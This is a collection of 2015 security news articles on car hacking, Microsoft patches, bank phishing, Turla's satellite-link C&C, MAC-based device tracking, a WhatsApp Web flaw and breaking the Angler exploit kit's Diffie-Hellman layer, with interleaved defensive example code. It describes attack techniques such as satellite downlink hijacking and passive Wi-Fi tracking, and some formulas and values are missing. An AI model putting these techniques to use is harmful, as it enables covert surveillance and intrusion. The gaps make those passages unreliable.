Valasek, who has since joined Uber’s Advanced Technology Center along with Miller, was making his first public appearance since the remote car hacking research dominated the summer. He had stern reminders about the opportunity in front of researchers and manufacturers to secure devices by design, and about the need for processes to update things already in the field that are connected and likely vulnerable.

But unlike software that can be updated monthly, or on-the-fly if need be, IOT devices have hardware dependencies that make patching challenging.

“There are a lot of complexities these companies have that regular software people don’t. Microsoft can refactor software and not care about the hardware it’s running on. The makers of things like cars cannot do that,” he said. Valasek and Miller were able to attack critical systems on the Jeeps they tested by finding connections via a CAN bus that talked to the entertainment system in the vehicle as well as steering, acceleration and braking systems. Fiat Chrysler America immediately issued a recall of 1.4 million vehicles to apply patches.

“They can’t just refactor,” Valasek said. “They have to replace hardware, which is impossible for a lot of large companies.”

The researcher urged that responsibility for security be shared by a number of parties, including parts manufacturers, OEMs and carriers in the case of the car-hacking research.

In the example of Valasek’s and Miller’s car hacking, the researchers found a vulnerability in a communications module called UConnect manufactured by Harman. Complicating matters was shoddy network segmentation by Sprint that allowed the researchers to use a burner phone purchased at Wal-Mart to act as a hotspot that enabled the remote attacks.

Sprint closed a number of open ports that did more to mitigate potential attacks than the Fiat Chrysler patch that closed a supposed air-gapped connection between CAN buses managing the vehicle’s respective entertainment and acceleration/braking systems, Valasek said. But the key is that the parties—minus Harman—were talking.

“These parties need to communicate and work to ensure networks used for their products are aware of each other,” Valasek said. “What we should do is put forth an effort to secure things when we design them, have design, implementation and remediation reviews. OTA (over-the-air) updates are a must. If something runs code, it will have to be fixed. Researchers have to keep researching.”

Windows, Office, Edge and Explorer have dangerous holes

10.9.2015 Vulnerabilities
This week Microsoft released its regular batch of updates, which always comes out in the second week of the month. This time, however, the helping of security patches is truly large: there are more than fifty of them. Some of the discovered bugs for which fixes were released are critical.
“Microsoft has released patches for more than 50 vulnerabilities affecting Windows and the applications Internet Explorer, Edge, Office, Lync, Exchange Server, .NET Framework, Exchange Server and Skype for Business Server,” warned analyst Pavel Bašta of the National Security Team CSIRT.

For Windows, for instance, the vulnerabilities affect practically all currently supported versions, i.e. Vista, 7, 8 and also the newest 10. Some of the holes are moreover labelled critical.

A cyber attacker can thus exploit them to run arbitrary malicious code on the compromised machine. He can easily smuggle an uninvited guest onto someone else's computer that will capture every keystroke, and then relatively easily obtain all of the user's passwords.

All the patches for the critical holes, released together with the batch of regular updates, can be downloaded through the Windows Update service.

Fraudsters lure with mortgages, then fleece people

10.9.2015 Hacking
Internet fraudsters have come up with a new trick in recent days. They pose as employees of Česká spořitelna and offer people favourable mortgages. In reality they are only trying to extract a confirmation SMS message that they can misuse to drain the client's account. Česká spořitelna warned about this new type of phishing attack.
Fraudulent page offering a favourable mortgage

The main problem is that a campaign for more favourable mortgages is really running at the bank. Clients hungry for a new home can thus easily be lured by the low interest rate of 1.85% per year.

“The fraudsters exploited our genuine marketing campaign in the SERVIS 24 internet banking, which concerns mortgages. They misused this marketing message with the aim of extracting the confirmation SMS code from clients. The bank never asks a client to confirm a marketing message with an SMS code,” warned representatives of Česká spořitelna.

The trick works on the same principle as the vast majority of phishing attacks. The fraudsters first smuggle a virus onto the computer, which then, when the user tries to log in to internet banking, presents a fake Servis 24 page with that irresistible offer.

Fraudulent page offering a favourable mortgage.

At the bottom of the page the user reads the following: “To continue working with personal data you need to enter the SMS code that was sent to your mobile phone. In this way you confirm that you are the true owner of the account and that we have informed you of the terms of the ongoing promotion.”

Of course, the fraudsters are not after any confirmation. The only thing they are trying to do is extract the SMS message from the gullible. After that, nothing stands between them and the money in the bank account.

While the vast majority of similar phishing scams are recognizable at first glance, this time the cyber pirates managed to copy the bank's internet banking perfectly. The page with the offer is moreover written in Czech without major spelling mistakes.

Only attentive users will spot the fraud
The only way more attentive users can recognize the fraud is thus to check the web address. From it the client can tell that they are not on the bank's site at all. Česká spořitelna's internet banking uses the address, whereas the fraudulent page shows in the browser's address bar. The cybercriminals may, however, change the address over time.

“If you suspect you have responded to a fraudulent message, contact Česká spořitelna's client line immediately on the toll-free number 800 207 207,” the bank's representatives stated.

It is of course not ruled out that fraudsters will soon try to dupe clients of other domestic banks with a similar trick. In such a case users should likewise contact their bank without delay.

Microsoft has prepared the first major patches for Edge

10.9.2015 Security
The new Edge browser, which Microsoft ships with Windows 10, received its first batch of security patches during its first Patch Tuesday. There were four in total. Its predecessor, the last Explorer, needed seventeen.

Microsoft introduced Edge as a new generation of browsers for Windows that should eventually replace Internet Explorer entirely. It is worth adding that all the critical bugs the current patches fix were also found in Explorer, which the company had already secured in an earlier update package.

“It was the possibility of being attacked through a specially crafted web page, whether you use Internet Explorer or Edge,” summarizes Wolfgang Kandek of the security company Qualys. According to him, the identical holes also reveal that Microsoft's developers drew on Explorer's code, at least to some extent, when creating Edge.

That their effort to build a safer browser is not without effect is shown by the comparison with Explorer itself, which needed seventeen patches against four for Edge.

“And it also shows how hard it is to write software that is completely bug-free and resistant to attacks,” Kandek adds.

Other bugs Microsoft flags in its current bulletin concern, among others, the popular office products Office 2007 and 2010. Qualys has recently observed a series of attacks that are triggered merely by opening a malicious Word or Excel document, which can then launch further actions the user need not know about at all.

In total, Microsoft has so far issued 105 security bulletins this year, only one fewer than for the whole of last year, and by Qualys' estimate the count will end the year at 145.

According to Kandek, however, this does not mean today's software is becoming more prone to attack. Rather, there are more skilled programmers and attackers capable of finding a gap in programs, helped by the growing diversity of the market, whether of the programs themselves or of the platforms they run on.

“The current numbers show what a fundamental role security is starting to play,” Kandek concludes.

Turla APT Group Abusing Satellite Internet Links


Poorly secured satellite-based Internet links are being abused by nation-state hackers, most notably by the Turla APT group, to hide command-and-control operations, researchers at Kaspersky Lab said today.

Active for close to a decade, Turla’s activities were exposed last year; the Russian-speaking gang has carried out espionage campaigns against more than 500 victims in 45 countries, most of those victims in critical areas such as government agencies, diplomatic and military targets, and others.

Its use of hijacked downstream-only links is a cheap ($1,000 a year to maintain) and simple means of moving malware and communicating with compromised machines, Kaspersky researchers wrote in a report. Those connections, albeit slow, are a beacon for hackers because links are not encrypted and ripe for abuse.


“Once an IP address that is routed through the satellite’s downstream link is identified, the attackers start listening for packets coming from the internet to this specific IP,” the researchers wrote. “When such a packet is identified, for instance a TCP/IP SYN packet, they identify the source and spoof a reply packet (e.g. SYN ACK) back to the source using a conventional Internet line.”

The legitimate subscriber whose IP address is being used, meanwhile, is none the wiser, because their system ignores the packet, which is addressed to an unconventional port.

“There is an important observation to make here,” the researchers wrote. “Normally, if a packet hits a closed port, a RST or FIN packet will be sent back to the source to indicate that there is nothing expecting the packet. However, for slow links, firewalls are recommended and used to simply DROP packets to closed ports. This creates an opportunity for abuse.”


Abuse of satellite links is not solely the domain of Turla. HackingTeam command and control servers, for example, were found to be using such links to mask operations, as were links traced to Rocket Kitten and Xumuxu, two APT groups that are government-backed or have governments as customers, Kaspersky said.

Kaspersky speculates that APT groups turn to satellite-based Internet links for C&C for a number of reasons, including as a countermeasure against botnet takedowns by law enforcement and ISPs, which open an avenue for researchers to determine who is behind an operation. Using these satellite links, however, is not without its risks to the attacker.

“On the one hand, it’s valuable because the true location and hardware of the C&C server cannot be easily determined or physically seized. Satellite-based Internet receivers can be located anywhere within the area covered by a satellite, and this is generally quite large,” the researchers wrote. “The method used by the Turla group to hijack the downstream links is highly anonymous and does not require a valid satellite Internet subscription. On the other hand, the disadvantage comes from the fact that satellite-based Internet is slow and can be unstable.”

Rather than buying expensive subscriptions to satellite-based links or hacking an ISP with a man-in-the-middle attack at the router level in order to hijack streams, Turla’s approach is much cheaper and keeps the attackers anonymous, Kaspersky said. They instead hijack satellite DVB-S links (similar research was presented at Black Hat in 2010), which requires minimal equipment: a satellite dish, a low-noise block downconverter, a dedicated DVB-S tuner on a PCIe card made by TBS Technologies, and a Linux PC.

“The TBS card is particularly well-suited to this task because it has dedicated Linux kernel drivers and supports a function known as a brute-force scan which allows wide-frequency ranges to be tested for interesting signals,” the researchers wrote. “Of course, other PCI or PCIe cards might work as well, while, in general the USB-based cards are relatively poor and should be avoided.”


The group behind Turla has been abusing DVB-S (digital video broadcasting-satellite) Internet providers in the Middle East and Africa, locations where the satellite beams do not cover Europe or Asia, steering them clear of many security researchers. Kaspersky published a long list of command and control servers resolving to satellite-based ISPs in its report, calling out one in particular that falls into a range belonging to Germany’s IABG mbH. That IP address appears, in encrypted form, inside a Turla backdoor called Agent.DNE compiled in 2007.

“Of course, for logistical reasons it is more straightforward to rely on bullet-proof hosting, multiple proxy levels or hacked websites, but this method provides an unmatched level of anonymity,” the researchers wrote. “In truth, the Turla group has been known to use all these other techniques as well, making for a very versatile, dynamic and flexible cyber-espionage operation.”

Last August, researchers at Kaspersky exposed many of Turla’s traditional hacking activities, including the use of watering hole attacks and spear phishing to initially compromise victims with the Snake or Uroburos backdoor. The Epic Turla campaign also used at least two zero-day exploits at the time, giving the hackers privilege escalation on Windows machines and code execution via an Adobe Reader vulnerability. There were also exploits against a number of patched vulnerabilities.
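From a defender's side, the hijacking described above has one useful property: because the SYN-ACK is spoofed over a terrestrial line, the only address a victim's flow records ever show is the innocent satellite subscriber's IP, so membership in satellite-ISP address space is the handle to detect on. The following is an added example, not code from the Kaspersky report: it scans flow records for hosts repeatedly contacting satellite ranges on unconventional ports. The prefixes are RFC 5737 placeholders standing in for the report's list, and the flow records and their format are constructed.

```python
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Placeholder prefixes (TEST-NET ranges) standing in for the satellite-ISP
# ranges listed in the report; substitute the real list in use.
SATELLITE_PREFIXES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]
ORDINARY_PORTS = {80, 443}  # a single web fetch to such a range is plausible
MIN_CONNECTIONS = 3         # repeated contact on an odd port is what marks a channel

# Constructed flow records in a simplified key=value format.
SAMPLE_FLOWS = """\
ts=1441900000 src=10.0.0.15 dst=203.0.113.7 dport=52891 proto=tcp bytes=1204
ts=1441900300 src=10.0.0.15 dst=203.0.113.7 dport=52891 proto=tcp bytes=980
ts=1441900600 src=10.0.0.15 dst=203.0.113.7 dport=52891 proto=tcp bytes=1110
ts=1441900050 src=10.0.0.22 dst=192.0.2.44 dport=443 proto=tcp bytes=55000
ts=1441900120 src=10.0.0.31 dst=198.51.100.9 dport=443 proto=tcp bytes=3000
ts=1441900900 src=10.0.0.15 dst=203.0.113.7 dport=52891 proto=tcp bytes=1002
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_flows(text: str) -> List[dict]:
    """Turn key=value flow lines into dicts with typed fields."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = dict(FIELD_RE.findall(line))
        flows.append({
            "ts": int(f["ts"]), "src": f["src"], "dst": f["dst"],
            "dport": int(f["dport"]), "proto": f["proto"], "bytes": int(f["bytes"]),
        })
    return flows


def is_satellite_dst(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in prefix for prefix in SATELLITE_PREFIXES)


def suspicious_beacons(flows) -> Dict[str, List[Tuple[str, int, int]]]:
    """Map each internal host to (dst, dport, count) tuples that look like a
    hijacked-satellite C&C channel: satellite address space, unusual port, repeated.
    The dst is the hijacked subscriber's IP, never the operator's own machine."""
    counts: Dict[Tuple[str, str, int], int] = defaultdict(int)
    for f in flows:
        if (f["proto"] == "tcp" and is_satellite_dst(f["dst"])
                and f["dport"] not in ORDINARY_PORTS):
            counts[(f["src"], f["dst"], f["dport"])] += 1
    findings: Dict[str, List[Tuple[str, int, int]]] = defaultdict(list)
    for (src, dst, dport), n in sorted(counts.items()):
        if n >= MIN_CONNECTIONS:
            findings[src].append((dst, dport, n))
    return dict(findings)


if __name__ == "__main__":
    for host, channels in suspicious_beacons(parse_flows(SAMPLE_FLOWS)).items():
        for dst, dport, n in channels:
            print(f"{host} -> {dst}:{dport} ({n} connections) lands in satellite space")
```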

Microsoft Releases 12 Security Updates (5 Critical and 7 Important Patches)


With the release of 12 Security Bulletins, Microsoft addresses a total of 56 vulnerabilities in its different products. The bulletins include five critical updates, out of which two address vulnerabilities in all versions of Windows.

The September Patch Tuesday update (released on the second Tuesday of each month) brings the total to 105 Security Bulletins released this year, already more than in the whole of the previous year, with three months of the current year still remaining.

The increase in the number of security bulletins in such a short time may be due to the release of Windows 10 and its installed base reaching 100 million.

Microsoft rates the severity of the vulnerabilities addressed by the 12 bulletins, MS15-094 through MS15-105, and their impact on the affected software.

Bulletins MS15-094 and MS15-095 are cumulative updates, i.e. product-specific fixes for security vulnerabilities that Microsoft rates 'Critical'.

Bulletins MS15-097 to MS15-099 are also rated Critical, since their impact is remote code execution (RCE) in the affected software.


1. Cumulative Security Update for Internet Explorer (MS15-094) covers Internet Explorer 7 through Internet Explorer 11 and is rated 'Critical' on Windows clients and 'Moderate' on Windows servers.

The vulnerabilities could allow an attacker to gain the administrative user rights of the victim when the victim visits a specially crafted web page set up by the attacker.

The security update addresses the flaws by:
Modifying how Internet Explorer (IE) handles objects in memory
Modifying how IE, JScript, and VBScript handle objects in memory
Helping to ensure that IE correctly permits file operations
2. Cumulative Security Update for Microsoft Edge (MS15-095) covers Microsoft Edge, the browser of the newly released Windows 10, and is rated Critical for all Windows 10 clients.

The vulnerabilities are the same as in MS15-094, present in both Microsoft Edge and Internet Explorer. The update addresses the flaws by modifying how Microsoft Edge handles objects in memory.

3. RCE Vulnerabilities in Microsoft Graphics Component (MS15-097) allow remote code execution when the victim opens a specially crafted document or visits an untrusted web page containing Embedded OpenType fonts (.eot).

This security update is rated 'Critical' for:
All supported versions of Windows Vista and Windows Server 2008
All affected versions of Microsoft Lync 2013, Microsoft Lync 2010, and Microsoft Live Meeting 2007
All affected versions of Microsoft Office 2007 and Microsoft Office 2010
The vulnerabilities were resolved by correcting how:
Windows Adobe Type Manager Library handles OpenType fonts
Windows kernel-mode driver handles objects in memory
Windows validates integrity levels to prevent inappropriate process initialization
Windows kernel handles memory addresses
4. RCE Vulnerabilities in Windows Journal (MS15-098) lets an attacker remotely execute malicious code if a user opens a specially crafted Journal file.

This security update is rated Critical for all supported releases of Windows operating system and addresses the issues by modifying how Windows Journal parses Journal files.

5. RCE Vulnerabilities in Microsoft Office (MS15-099) allow an attacker to run arbitrary code in the name of the logged-on user, which is most damaging when the victim has administrative rights.

Users with limited rights are therefore less exposed. The affected software includes:
All versions of Microsoft Office 2007
All versions of Microsoft Office 2010
All versions of Microsoft Office 2013
All versions of Microsoft Office 2013 RT
The security update addresses the flaws by correcting how Microsoft Office handles files in memory and by modifying how SharePoint validates web requests.


The remaining bulletins, MS15-096 and MS15-100 to MS15-105, are rated 'Important' on Microsoft's severity scale and affect:
various versions of Microsoft Windows
Lync messenger
Microsoft Exchange Server
Microsoft .NET, to name a few
The vulnerabilities could allow attackers to conduct attacks such as:
Denial of Service
Privilege escalation
Information disclosure
Other security bypasses
Microsoft has acknowledged researchers at Google Project Zero, hyp3rlinx, FireEye Inc., Fortinet's FortiGuard Labs, Cisco Talos and many more as contributors who helped it provide adequate security to users.

For the updates, you will have to follow the same method of downloading and installing the Windows update for your system.

TIP for Windows users: Keep your system's Windows Update settings to "Check for Updates but let me choose whether to download and install them."

Techie Police Officer Builds a Sniffing Tool to Track Stolen Devices (based on War-Driving)


Ever wonder how you can track your stolen smartphone, laptop or any smart device?

...With the IMEI number?

...Or the IP address?

...Or maybe some special type of equipment?

Well, none of these are required, because it is now possible to track stolen devices just by scanning for their MAC addresses.

Yes, just MAC addresses, which are assigned uniquely to each device (from address blocks allocated by the IEEE), although crooks can modify them in an attempt to hide the origin of a stolen device.

But since people rarely change, or even notice, the MAC address of their mobile phone, tablet, laptop, desktop, smart TV, smart refrigerator or broadband router, MAC addresses can be used to track stolen electronics.

This exactly is what an Iowa City cop wants to do.

How Can Police Track Stolen Devices?

According to The Gazette, Iowa police officer David Schwindt has developed sniffing software that helps police find more stolen property.

The tool, which Schwindt dubbed L8NT (short for Latent analysis of 802.11 Network Traffic), combines the software with a specialized wireless dongle and a suitable antenna, and scans for and locates MAC addresses associated with known stolen devices.

The MAC addresses of stolen devices are stored in the L8NT database, and depending on the situation they are easy to identify in the captured traffic.

How does 'L8NT' Work?

When L8NT is running, the software is channel hopping through the 2.4 GHz and/or 5 GHz bands and receiving packets.

The source and destination MAC addresses are extracted from the MAC header of each packet and compared to the known stolen MAC addresses in the database.

If a MAC address is not in the L8NT database, it is ignored; if there is a match, the L8NT user is notified.

By switching to a directional antenna and using the signal strength meter in L8NT, the user can follow the signal back to the physical device.

However, the stolen device must have its wireless networking (Wi-Fi) turned on. If Wi-Fi is turned off or the device is powered down, the device will not be visible.
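The matching step just described, as an added example that is not L8NT's code: it parses the 802.11 MAC header of each captured frame, picks the source and destination addresses according to the To DS / From DS flags, and compares them against a watchlist. The frames and MAC addresses are constructed for the example. It also flags addresses with the locally administered bit set, which is what a modified or randomized MAC looks like on the air and why a match on such an address deserves less trust than one on a vendor-assigned address.

```python
"""L8NT-style matching of captured 802.11 frames against a stolen-device watchlist.

Added example, not L8NT's code. The frames below are constructed sample headers
(no real captures) and the MAC addresses are made up.
"""
import struct

# Constructed watchlist: MAC addresses reported as stolen.
STOLEN_MACS = {"00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"}


def fmt_mac(raw):
    return ":".join("%02x" % b for b in raw)


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def is_locally_administered(mac):
    """U/L bit (0x02 of the first octet) set: the address was assigned in software,
    not by the vendor, so it may have been changed or randomized."""
    return int(mac[:2], 16) & 0x02 != 0


def parse_header(frame):
    """Return {'type', 'src', 'dst'} for one raw 802.11 frame, or None if too short.

    Frame control is little-endian; bits 2-3 give the frame type, bits 8 and 9 the
    To DS / From DS flags, which decide which of addr1..addr4 carry SA and DA.
    """
    if len(frame) < 10:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype = (fc >> 2) & 0x3
    to_ds, from_ds = (fc >> 8) & 1, (fc >> 9) & 1
    if ftype == 1:                       # control frame: only the receiver address
        return {"type": "control", "src": None, "dst": fmt_mac(frame[4:10])}
    if len(frame) < 24:
        return None
    a1, a2, a3 = fmt_mac(frame[4:10]), fmt_mac(frame[10:16]), fmt_mac(frame[16:22])
    if not to_ds and not from_ds:        # ad-hoc / management: DA, SA, BSSID
        src, dst = a2, a1
    elif from_ds and not to_ds:          # AP -> station: DA, BSSID, SA
        src, dst = a3, a1
    elif to_ds and not from_ds:          # station -> AP: BSSID, SA, DA
        src, dst = a2, a3
    else:                                # WDS: RA, TA, DA, SA (addr4 after seq ctrl)
        if len(frame) < 30:
            return None
        src, dst = fmt_mac(frame[24:30]), a3
    return {"type": "data" if ftype == 2 else "mgmt", "src": src, "dst": dst}


def match_frames(frames, watchlist):
    """Return (mac, role, locally_administered) for every watchlisted SA/DA seen."""
    hits = []
    for frame in frames:
        hdr = parse_header(frame)
        if hdr is None:
            continue
        for role in ("src", "dst"):
            mac = hdr[role]
            if mac and mac in watchlist:
                hits.append((mac, role, is_locally_administered(mac)))
    return hits


# Constructed capture: four frames seen while channel hopping.
AP, LAPTOP, PHONE, OTHER = "c0:ff:ee:00:00:01", "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01", "10:20:30:40:50:60"
BCAST, SEQ = "ff:ff:ff:ff:ff:ff", b"\x10\x00"
FRAMES = [
    b"\x08\x01\x00\x00" + mac_bytes(AP) + mac_bytes(LAPTOP) + mac_bytes(BCAST) + SEQ,  # data, To DS
    b"\xd4\x00\x00\x00" + mac_bytes(OTHER),                                              # ACK (control)
    b"\x08\x02\x00\x00" + mac_bytes(PHONE) + mac_bytes(AP) + mac_bytes(AP) + SEQ,        # data, From DS
    b"\x80\x00\x00\x00" + mac_bytes(BCAST) + mac_bytes(AP) + mac_bytes(AP) + SEQ,        # beacon (mgmt)
]

if __name__ == "__main__":
    for mac, role, local in match_frames(FRAMES, STOLEN_MACS):
        note = " (locally administered, may have been changed)" if local else ""
        print("match: %s as %s%s" % (mac, role, note))
```

A real capture would feed `match_frames` from a monitor-mode interface (with the radiotap header stripped first); the parsing rules are the same. The locally administered flag is the practical limit of the technique: a device whose MAC has been rewritten, or a modern phone that randomizes its address, simply never matches the watchlist.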

Intelligence Agencies Used Similar Technology to Spy

Leaked NSA documents last year revealed that…

Under the "Passengers tracking operation", the Canadian spy agency was tracking passengers even days after they had left the airport terminal, just by capturing their devices' MAC addresses via the free Wi-Fi service at a major Canadian airport.

The documents also revealed that the federal intelligence agency was collecting MAC addresses at United States airports as well, and at thousands of other public places in the U.S.

Laws and L8NT

The traditional method used by law enforcement for recovering lost or stolen devices is to physically examine the device to obtain the model and serial number.

"However, physical examination of most devices is extremely difficult because of Constitutional search and seizure issues," the L8NT website reads. "In most cases, law enforcement is only able to create a report of the theft for insurance purposes."

Schwindt promises that L8NT does not record any personal or sensitive information from the device; it only scans for MAC addresses flagged as contraband.

The officer has developed a proof-of-concept software, but hopes to patent L8NT and will apply for a full patent this fall.

200 Million WhatsApp Users Vulnerable to vCard Vulnerability


WhatsApp recently claimed to have hit 900 Million monthly active users, but a dangerous security flaw in the web version of the popular instant messaging app puts up to 200 Million of its users at risk.

Yes, the web-based extension of WhatsApp is vulnerable to an exploit that could allow hackers to trick users into downloading malware on their computers in a new and more sophisticated way.

WhatsApp made its web client, WhatsApp Web, available to iPhone users just last month, after first rolling out its web-based instant messaging service for Android, Windows and BlackBerry Phone earlier in the year.

Similar to Facebook Messenger, WhatsApp Web is an effective way to experience the mobile app in a web browser, allowing you to view all of the conversations you have made with your friends – including images, audio files, videos, GPS location and contact cards – straight on your PCs.

However, a security flaw discovered by Check Point's security researcher Kasif Dekel could allow hackers to compromise your machines by distributing malware including:
Remote Access Tools (RATs) – Give hackers remote access to the victim's PC
Ransomware – Forces victims to pay a ransom in order to regain access to their systems and personal data
Bots – Cause the machines to slow down to a crawl
Other malicious software

Here's How the WhatsApp Exploit Works

In order to exploit the vulnerability, all an attacker needs is to send a seemingly innocent vCard contact card containing a malicious code to a WhatsApp user, and, of course, the target's phone number.
"To target an individual, all an attacker needs is the phone number associated with the [WhatsApp] account," Oded Vanunu from Check Point wrote in a blog post on Tuesday.
According to the researcher, it is easy for anyone to create and send a .BAT file as a legit vCard that looks like any other message from a friend, but actually triggers a malicious code when clicked.

Once the vCard is opened in WhatsApp Web, the executable malicious code in the card runs on the target machine, further leaving the infected machine open to other attacks that could:
Take complete control over the target machine
Monitor user's activities
Use the target machine to spread viruses
The WhatsApp security team has verified and acknowledged the vulnerability and has rolled out an update to fix the issue in its web clients.

The flaw affects all versions of WhatsApp before V0.1.4481. So, users are advised to make sure that they are running the fully updated version of WhatsApp.

Attacking Diffie-Hellman protocol implementation in the Angler Exploit Kit

9.9.2015 Source: Kaspersky

Exploit kit creators have been inventing increasingly interesting methods of masking their exploits, shellcodes and payloads so that it is harder for analysts to determine the type of exploit and what actions it may perform.

Several days ago analysts found the Diffie-Hellman cryptographic protocol being used in the Angler Exploit Kit, one of the most popular exploit kits at the moment. The protocol was developed more than 40 years ago, but this is the first known case of its use in an exploit kit.

In Angler, the threat actors used the Diffie-Hellman protocol to deliver a structure containing the shellcode of a recent exploit for the CVE-2015-2419 vulnerability in Internet Explorer 11, and later the exploit for the CVE-2015-5560 vulnerability in Adobe Flash. Most likely the goal was to make firewall detection of the exploit difficult (a firewall cannot recover the shellcode and exploit from intercepted traffic) and to make it harder for analysts to obtain the exploit code. However, experts from Kaspersky Lab managed to attack the Diffie-Hellman protocol implementation successfully and decipher the shellcode.

Angler vs. Analysts

To make matters worse for analysts, several layers of JavaScript and ActionScript obfuscation, and a ban on the user's IP address once the encrypted structure with the shellcode has been sent, were used in addition to the Diffie-Hellman protocol. Because the structure with the shellcode is obtained this way (encrypted with a one-time key established via Diffie-Hellman), the exploit kit sample becomes unusable after a single processing: the analyst cannot understand what a specific file does, cannot reproduce the attack and, quite often, cannot identify the exploit and the vulnerability at all.


There is a key exchange request in the picture above. As a response, a browser gets from the threat actors’ server an encrypted array that contains a shellcode to exploit the vulnerability. The same traffic request has been used to download the Flash vulnerability exploit.

As the secret for key generation is new each time, an analyst is unable to send it to the browser once more, reproduce the attack, and identify the vulnerability, even if he has the recorded traffic.

Diffie-Hellman Protocol Implementation Features

The Diffie-Hellman protocol implementation that was used works as follows:

1. The server generates a random number g (16 bytes) and sends the HTML page with the number g and a JavaScript implementation of the Diffie-Hellman algorithm to the user's browser.

2. In the user's browser, JavaScript generates a random modulus p (16 bytes) and a random private key Ka (16 bytes), calculates the public key A = g^Ka mod p and sends the three numbers (g, A, p) to the server as a JSON object along with the browser version.

3. The server generates its own random private key Kb and a random encryption key Kx (16 bytes) and computes the Diffie-Hellman shared secret Kdh = A^Kb mod p. It then encrypts the shellcode with the XTEA algorithm under the key Kx, followed by base64_encode and urlencode, giving the string b. The key Kx is likewise encrypted with XTEA under the key Kdh, base64_encoded and urlencoded, giving the string k. Finally, the server calculates its public key B = g^Kb mod p and sends a Base64-encoded JSON object containing B, k and b to the browser:

After Base64 decoding:

4. The user's browser calculates the Diffie-Hellman shared secret Kdh = B^Ka mod p, recovers the key Kx from k (urldecode, base64_decode, then XTEA decryption with Kdh) and finally recovers the shellcode from b (urldecode, base64_decode, then XTEA decryption with Kx).


It is safe to assume that the aim of this sophisticated cryptographic scheme is to prevent the shellcode from being intercepted by anyone listening to the Internet traffic between the exploit kit server and the user's browser. We managed to attack the implementation of the encryption protocol successfully and decrypt the shellcode. For the attack we used a modified Pohlig-Hellman algorithm (a deterministic algorithm for finding discrete logarithms in the residue ring modulo a prime number).

In the original algorithm, when the factorization of the Euler function of the modulus p into prime factors qi is known (with pairwise coprime prime-power factors Qi)

the complexity of finding the private key Ka, and hence the Diffie-Hellman shared secret Kdh, from the intercepted public keys A and B is

We used an optimized algorithm for finding the discrete logarithm in the residue ring modulo a prime, taking into account that log p is negligible compared with qi and that large prime factors raised to a power greater than one rarely occur in the Euler function φ(p); i.e., with high probability αi equals one for large qi. Owing to that, the complexity of the modified algorithm is

which allows us to perform a successful attack if all qi < 10^18. The experiment has shown that this condition holds in more than half of the cases for the Diffie-Hellman protocol implementation described above (where g, p, Ka and Kb are generated randomly without any extra security checks).


Description of the Modified Pohlig-Hellman Algorithm

1. Let us find the factorization of the number p into prime factors (the factorization can easily be done with Cryptool):

p = 0x1b0b5c6e6b0b5b7e6c6d0b1b0a8c3c7e = 35948145881546650497425055363061529726 = 2 * 101 * 521 * 195197 * 7138079603 * 245150552958961933

2. Let us find the Euler function of the number p:

φ(p) = (2 - 1) * (101 - 1) * (521 - 1) * (195197 - 1) * (7138079603 - 1) * (245150552958961933 - 1) = 17761863220777184249809368812124288000

3. Let us find the factorization of the Euler function into prime factors:

φ(p) = 2^10 * 3^2 * 5^3 * 13 * 19 * 79 * 167 * 383 * 48799 * 45177719 * 5603527793

4. In order to find the browser's private key Ka, it is necessary to find a discrete logarithm:

A = g^Ka mod p
A = 0x5eff90f1c48342f5d519cd02b5dfd8b = 7892150445281019518426774740123123083
g = 0x40a262b1360a6a16612ca8251161a9a5 = 14017453774474660607531272629759062185 (mod p)

As finding Ka modulo φ(p) directly is quite time-consuming, let us find Ka in turn modulo each of the coprime factors Qi of the Euler function φ(p)

[1024, 9, 125, 13, 19, 79, 167, 383, 48799, 45177719, 5603527793],

and then, from the obtained results and the Chinese remainder theorem, find Ka modulo φ(p).

5. In order to find Ka modulo Qi, it is necessary to find a discrete logarithm


To do that, we shall

5.1. take the number H = ⌊√Qi⌋ + 1;
5.2. calculate Dc = Da^H mod p;
5.3. make a sorted table of the values Dc^u mod p for 1 ≤ u ≤ H;
5.4. find a value 0 ≤ v ≤ H such that the element Db · Da^v mod p is in the table;
5.5. the value of Ka modulo Qi then equals H·u - v.

The implementation of the described algorithm in Java is given in Appendix A. As the maximum value of Qi in the reviewed example is only several billion, the program ran for no more than a few seconds.

For some of the factors Qi of the Euler function φ(p) there are several possible values of Ka (row i lists the possible values of Ka modulo Qi); only two rows of the table survived extraction:

[834, 898, 962, 2, 842, 906, 970, 10, 850, 914, 978, 18, 858, 922, 986, 26, 866, 930, 994, 34, 874, 938, 1002, 42, 882, 946, 1010, 50, 890, 954, 1018, 58, 826]

[18, 68, 118, 43, 93]

6. By going over all possible combinations of the obtained Ka values with the Chinese remainder theorem, we find several tens of possible values of Ka modulo φ(p):



7. All of the obtained values of the private key Ka lead to the same value of the Diffie-Hellman shared secret Kdh = B^Ka mod p:


8. Knowing Kdh, it is possible to decrypt the encryption key Kx from k, and then the shellcode using Kx. The PHP script for decrypting the intercepted shellcode with the known Diffie-Hellman shared secret is given in Appendix B. The decrypted shellcode is given in Appendix C.
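Steps 1 to 8 above, as an added Python example (not Kaspersky's Java from Appendix A): `toy_exchange` performs the key exchange of steps 1 to 4 on a small constructed modulus (without the XTEA layer), and `pohlig_hellman` recovers Ka with the inverse-free baby-step giant-step of steps 5.1 to 5.5 for each prime-power factor Qi, combining the residues with the Chinese remainder theorem as in step 6. It assumes Da = g^(φ(p)/Qi) and Db = A^(φ(p)/Qi), the standard Pohlig-Hellman reduction, which the page does not spell out; the factorizations of p and φ(p) and the values of g, A and B are those printed on the page and in Appendix A. Because every Ka' with g^Ka' = A (mod p) yields the same Kdh = B^Ka' mod p, one residue per Qi suffices instead of the full table of candidates.

```python
"""Pohlig-Hellman attack on the Angler-style Diffie-Hellman exchange (added example).

Assumed reduction (not spelled out on the page): for each prime-power factor Q_i of
phi(p), Da = g^(phi(p)/Q_i) and Db = A^(phi(p)/Q_i), so that Db = Da^Ka (mod p) and
Ka modulo the order of Da can be found with a search of size about sqrt(Q_i).
"""
from functools import reduce
from math import gcd, isqrt


def product(xs):
    return reduce(lambda a, b: a * b, xs, 1)


def bsgs_no_inverse(da, db, q, p):
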